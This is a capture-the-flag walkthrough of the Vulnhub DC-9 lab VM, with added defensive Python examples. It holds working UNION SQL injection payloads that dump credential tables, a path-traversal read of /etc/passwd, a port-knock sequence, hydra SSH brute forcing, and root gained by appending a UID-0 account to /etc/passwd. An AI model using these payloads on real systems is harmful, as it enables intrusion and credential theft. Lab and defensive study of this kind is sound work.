Exploitation Guide for DC: 9 | Vulnhub | No SQLmap
In this walkthrough we will exploit SQLi to get credentials, use one of those credentials to log in to a web app that is vulnerable to LFI, use the LFI to read the port knock configuration, open the filtered SSH port, brute force SSH with the credentials we found, and then abuse a script that can read and append to files as root to get root privileges.
┌──(imtodess㉿deathnote)-[~/…/boxes/vulnhub/dc9/scans]
└─$ sudo nmap $ip -sVCS -oN nmapInitial.txt -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 00:01 EDT
Nmap scan report for 192.168.1.64
Host is up (0.000084s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:2E:41:78 (VMware)
We can enter the name of an employee and it will give back information.
This could be vulnerable to SQLi. Test for SQLi: with up to 6 columns we get a normal response, but on 7 we get no result.
Test for Union attack:
fred' union select table_name,NULL,NULL,NULL,NULL,NULL from information_schema.tables -- -
We got table names in the response. We now know the search function is vulnerable to a SQLi UNION attack. We will use this to get various information.
We will use Burp for the manual SQLi.
The database has the following tables:
Now get the columns of these tables.
fred' union select column_name,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_name='Users' -- -
Note: URL encode the payload if you are using Burp.
fred' union select column_name,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_name='UserDetails' -- -
Get username and password from table Users.
fred' union select username,password,NULL,NULL,NULL,NULL from Users -- -
We got usernames and password hashes from table Users. Now from UserDetails:
fred' union select username,password,NULL,NULL,NULL,NULL from users.UserDetails -- -
We now have a bunch of usernames and passwords. Make a list for later use.
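To show why the search box behaves this way, here is an added example (not code from the box or from this page) that runs the page's UNION payload against a string-concatenated query and against a parameterised one, using an in-memory SQLite database in which sqlite_master stands in for MySQL's information_schema.tables; the StaffDetails table and its rows are constructed.

```python
import sqlite3

# Constructed stand-in for the staff search behind the page's name box.
# sqlite_master plays the role that information_schema.tables plays in MySQL.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE StaffDetails(firstname TEXT, lastname TEXT, username TEXT,
                                  position TEXT, email TEXT, phone TEXT);
        CREATE TABLE Users(username TEXT, password TEXT);
        INSERT INTO StaffDetails VALUES ('fred', 'Flintstone', 'fredf', 'Manager',
                                         'fred@example.com', '555-0100');
        INSERT INTO Users VALUES ('fredf', 'HASH-PLACEHOLDER');
    """)
    return conn

COLUMNS = "firstname, lastname, username, position, email, phone"

def search_vulnerable(conn, name):
    # Input is spliced into the SQL text: a quote in the name closes the string
    # literal and everything after it is parsed as SQL.
    sql = "SELECT %s FROM StaffDetails WHERE firstname = '%s'" % (COLUMNS, name)
    return conn.execute(sql).fetchall()

def search_safe(conn, name):
    # A bound parameter is always data: the whole payload is compared against
    # firstname and no UNION is ever parsed.
    sql = "SELECT %s FROM StaffDetails WHERE firstname = ?" % COLUMNS
    return conn.execute(sql, (name,)).fetchall()

# The page's table-name payload, with sqlite_master in place of information_schema.tables.
PAYLOAD = "fred' union select name,NULL,NULL,NULL,NULL,NULL from sqlite_master -- -"

def leaked_table_names(conn):
    # Rows whose other five columns are NULL came from the injected SELECT.
    rows = search_vulnerable(conn, PAYLOAD)
    return sorted(r[0] for r in rows if r[1:] == (None,) * 5)

def union_column_count_error(conn, ncols):
    # Why the page saw results up to 6 columns and nothing at 7: a UNION whose
    # halves differ in column count is a SQL error, shown by the app as "no result".
    payload = "fred' union select " + ",".join(["NULL"] * ncols) + " from sqlite_master -- -"
    try:
        search_vulnerable(conn, payload)
        return False
    except sqlite3.OperationalError:
        return True
```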
Notice the "file does not exist" message. It seems like the page is trying to load a file which is not present on the system: a possible LFI vector.
Add ?file=../../../../../../etc/passwd and we get the content of /etc/passwd.
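An added example (not from the page or the box) of how that include should have been handled: the requested name is resolved under the include directory after symlinks are followed, and anything that lands outside it, including the traversal string above, is refused. The directory layout is constructed in a temporary directory.

```python
import os
import tempfile

def resolve_include(base_dir, requested):
    """Return the absolute path to serve for ?file=<requested>, or None if the
    request escapes base_dir. Both paths are resolved with realpath, so "../"
    chains and symlinked entries cannot reach /etc/passwd."""
    base = os.path.realpath(base_dir)
    # Joining an absolute 'requested' would discard base, so strip leading slashes.
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/")))
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate

def demo():
    # Constructed web root with one legitimate include target.
    root = tempfile.mkdtemp()
    inc = os.path.join(root, "includes")
    os.mkdir(inc)
    with open(os.path.join(inc, "about.php"), "w") as f:
        f.write("<p>About us</p>")
    # A symlink inside the include dir pointing at /etc/passwd must also be refused.
    os.symlink("/etc/passwd", os.path.join(inc, "pw"))
    return {
        "about.php": resolve_include(inc, "about.php") is not None,
        "traversal": resolve_include(inc, "../../../../../../etc/passwd") is None,
        "absolute": resolve_include(inc, "/etc/passwd") is None,
        "symlink": resolve_include(inc, "pw") is None,
    }
```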
From the Nmap scan we know that SSH is running on the system but is being filtered. We will search for a port knock configuration file.
Found the configuration in /etc/knockd.conf.
Use the following one-liner to open SSH.
for x in 7469 8475 9842; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x $ip; done
Change the IP accordingly.
┌──(imtodess㉿deathnote)-[~/…/boxes/vulnhub/dc9/loot]
└─$ for x in 7469 8475 9842; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x $ip; done
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 01:26 EDT
Nmap scan report for 192.168.1.64
Host is up (0.00062s latency).
PORT STATE SERVICE
7469/tcp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 01:26 EDT
Nmap scan report for 192.168.1.64
Host is up (0.00056s latency).
PORT STATE SERVICE
8475/tcp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 01:26 EDT
Nmap scan report for 192.168.1.64
Host is up (0.00052s latency).
PORT STATE SERVICE
9842/tcp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
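As an added illustration of why that loop works (not the box's knockd or its configuration), here is a simplified version of the server-side sequence matching that knockd performs, run over constructed iptables-style connection log lines; the 5-second window is an assumed seq_timeout, not a value from the page.

```python
import re

KNOCK_SEQUENCE = (7469, 8475, 9842)  # the sequence read from /etc/knockd.conf
SEQ_TIMEOUT = 5                       # assumed seq_timeout in seconds, not from the page

# Simplified iptables-LOG style line: "<epoch> ... SRC=<ip> ... DPT=<port> ..."
LINE_RE = re.compile(r"^(?P<ts>\d+) .*SRC=(?P<src>\S+) .*DPT=(?P<dpt>\d+)")

def find_completed_knocks(lines, sequence=KNOCK_SEQUENCE, timeout=SEQ_TIMEOUT):
    """Return (src, ts) for every source that hit the whole sequence in order
    within `timeout` seconds. A knock to the wrong port, or one arriving after
    the window, resets that source's progress, so the three ports must arrive
    back to back, which is exactly what the one-liner above sends."""
    progress = {}   # src -> [index of next expected port, ts of first knock]
    completed = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src, dpt = int(m["ts"]), m["src"], int(m["dpt"])
        idx, started = progress.get(src, [0, ts])
        if idx > 0 and ts - started > timeout:
            idx = 0                        # window expired: start over
        if dpt == sequence[idx]:
            if idx == 0:
                started = ts               # first knock opens the window
            idx += 1
        elif dpt == sequence[0]:
            idx, started = 1, ts           # wrong knock, but it begins a new attempt
        else:
            idx = 0                        # wrong port: discard progress
        if idx == len(sequence):
            completed.append((src, ts))
            progress.pop(src, None)
        else:
            progress[src] = [idx, started]
    return completed

# Constructed log lines: .65 knocks correctly, .77 is too slow, .88 only tries SSH.
LOG_LINES = [
    "1631251560 dc-9 kernel: IN=ens33 SRC=192.168.1.65 DST=192.168.1.64 PROTO=TCP DPT=7469 SYN",
    "1631251561 dc-9 kernel: IN=ens33 SRC=192.168.1.65 DST=192.168.1.64 PROTO=TCP DPT=8475 SYN",
    "1631251561 dc-9 kernel: IN=ens33 SRC=192.168.1.65 DST=192.168.1.64 PROTO=TCP DPT=9842 SYN",
    "1631251570 dc-9 kernel: IN=ens33 SRC=192.168.1.77 DST=192.168.1.64 PROTO=TCP DPT=7469 SYN",
    "1631251580 dc-9 kernel: IN=ens33 SRC=192.168.1.77 DST=192.168.1.64 PROTO=TCP DPT=8475 SYN",
    "1631251581 dc-9 kernel: IN=ens33 SRC=192.168.1.77 DST=192.168.1.64 PROTO=TCP DPT=9842 SYN",
    "1631251590 dc-9 kernel: IN=ens33 SRC=192.168.1.88 DST=192.168.1.64 PROTO=TCP DPT=22 SYN",
]
```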
Check if SSH is open.
┌──(imtodess㉿deathnote)-[~/…/boxes/vulnhub/dc9/loot]
└─$ nmap $ip -p 22
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 01:26 EDT
Nmap scan report for 192.168.1.64
Host is up (0.00063s latency).
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
It is. Now it is time to use the list of credentials we got earlier to see if any of them give a valid SSH login.
┌──(imtodess㉿deathnote)-[~/…/boxes/vulnhub/dc9/loot]
└─$ hydra -u -L username.txt -P passwords.txt -u $ip ssh -t 10
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-10 04:07:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 289 login tries (l:17/p:17), ~29 tries per task
[DATA] attacking ssh://192.168.1.64:22/
[22][ssh] host: 192.168.1.64 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.1.64 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.1.64 login: janitor password: Ilovepeepee
Found 3 valid SSH credentials. Log in as janitor. There is a secret folder in the home directory.
┌──(imtodess㉿deathnote)-[~/…/boxes/vulnhub/dc9/loot]
└─$ ssh janitor@192.168.1.64
janitor@192.168.1.64's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Sep 10 18:07:42 2021 from 192.168.1.65
janitor@dc-9:~$ ls -la
total 16
drwx------ 4 janitor janitor 4096 Sep 10 18:06 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Sep 10 18:06 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
Found another set of credentials:
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
Update the wordlist and brute force SSH again.
┌──(imtodess㉿deathnote)-[~/…/boxes/vulnhub/dc9/loot]
└─$ hydra -u -L username.txt -P pass.txt -u $ip ssh -t 10
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-10 04:14:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 340 login tries (l:17/p:20), ~34 tries per task
[DATA] attacking ssh://192.168.1.64:22/
[22][ssh] host: 192.168.1.64 login: fredf password: B4-Tru3-001
Switch user to fredf and check for sudo privileges.
janitor@dc-9:~/.secrets-for-putin$ su fredf
Password:
fredf@dc-9:/home/janitor/.secrets-for-putin$ cd
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
We can run a script as sudo; let's see what it does.
fredf@dc-9:/opt$ cd devstuff/
fredf@dc-9:/opt/devstuff$ ls
build dist __pycache__ test.py test.spec
fredf@dc-9:/opt/devstuff$ cat test.
cat: test.: No such file or directory
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python
import sys

if len(sys.argv) != 3:
    print("Usage: python test.py read append")
    sys.exit(1)
else:
    # Read the whole first file ...
    f = open(sys.argv[1], "r")
    output = (f.read())
    # ... and append it to the second file. There are no path checks, so under
    # sudo this can append to any file root can write, /etc/passwd included.
    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
fredf@dc-9:/opt/devstuff$
It simply appends the content of one file to another. Since we can run this script with sudo privileges, we can write to any file. We will write to /etc/passwd to create a new user with root privileges.
Create a password hash (openssl passwd with no algorithm flag produces a DES crypt hash, which is why it warns about truncating to 8 characters):
fredf@dc-9:/tmp$ openssl passwd givemeroot
Warning: truncating password to 8 characters
BKLzEP1rEQre2
Create a file with the following line:
fredf@dc-9:/tmp$ cat /tmp/hash.txt
imtodess:BKLzEP1rEQre2:0:0:root:/root:/bin/bash
Run the script:
fredf@dc-9:/tmp$ sudo /opt/devstuff/dist/test/test /tmp/hash.txt /etc/passwd
Change to new user:
fredf@dc-9:/tmp$ su imtodess
Password:
Get the flag:
root@dc-9:/tmp# cd
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.
I also want to send out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, but...just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.
So long, and thanks for all the fish.
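To close from the defender's side, an added example (not from the page) that audits /etc/passwd for the two artefacts the final step leaves behind: a second UID-0 account and a password hash sitting in passwd instead of shadow. The passwd excerpt is constructed, with the page's appended line last.

```python
# Constructed /etc/passwd excerpt; the last line is the entry the walkthrough appends.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1001:1001:Fred Flintstone,,,:/home/fredf:/bin/bash
imtodess:BKLzEP1rEQre2:0:0:root:/root:/bin/bash
"""

def audit_passwd(text):
    """Return (username, reason) findings for entries that indicate the
    /etc/passwd append trick used on DC-9: an extra UID-0 account, a password
    hash stored in passwd instead of shadow, or a malformed line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry (%d fields) at line %d"
                             % (len(fields), lineno)))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if not uid.isdigit() or not gid.isdigit():
            findings.append((name, "non-numeric uid/gid"))
            continue
        if uid == "0" and name != "root":
            findings.append((name, "UID 0 account other than root"))
        # 'x', '*', '!' and empty mean "look in /etc/shadow" or "locked";
        # anything else is a hash that login will honour directly from passwd.
        if pw not in ("x", "*", "!", ""):
            findings.append((name, "password hash stored in /etc/passwd (bypasses /etc/shadow)"))
    return findings
```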